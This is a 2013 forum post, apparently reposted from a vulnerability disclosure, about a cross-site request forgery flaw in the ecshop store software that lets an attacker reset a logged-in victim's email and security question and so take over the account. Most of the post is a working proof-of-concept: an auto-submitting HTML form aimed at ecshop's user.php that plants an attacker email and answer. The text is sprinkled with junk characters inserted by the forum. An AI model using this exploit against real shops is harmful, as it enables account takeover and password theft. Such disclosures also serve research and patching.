找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1976|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
& m  L# s4 \% t3 r; oecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
# B' |; ], J7 t$ Y% o; J
; E1 N' m6 P% vDemo For:http://www.wooyun.org/bug.php?action=view&id=395: I6 K: f5 t! |+ r  c" _
4 b: h$ x8 j- Z& P3 v" J* f% D2 h
详细说明:
+ I8 v+ V& L- M; c6 f! Y, m& f利用csrf和xss可以突破官方所说的“障碍”
4 }& _4 K. R( c6 Jxss版本已经有人说明
& s  k8 H, G- {5 V$ n0 f这里给出csrf版本
( L. W7 O& p) k: p: y0 e' C( w7 A% ~( Q
漏洞证明:2 U. U" U0 m7 q: S
<html>
4 q# G# j# f7 M/ P) p<body>$ L5 ^- P, N8 q% j6 W1 z
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">! U3 B+ R+ B8 I1 j# d9 _; T) X
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">+ {) ^  d0 p" K( v* I9 D
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
5 F; e+ [" O2 M) y. w8 J<INPUT TYPE="text" NAME="sel_question" value="ecshop">' U0 r$ ^. R9 B& ]
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
- g) X& h! G1 w( N9 s% Y</body>
. p/ H: T  e. n; P% ?3 n0 k<script>8 c* r2 B; X! W4 W& z: j4 f( l
document.forms[0].submit();. w- ]% l9 u& I/ m! ^
</script>
0 b2 j1 F; H  N" o: g6 R</html>  i* p1 F8 Q8 h
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失8 j; K' s- c: [+ @, }
  g* [4 \% q& c3 C/ H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表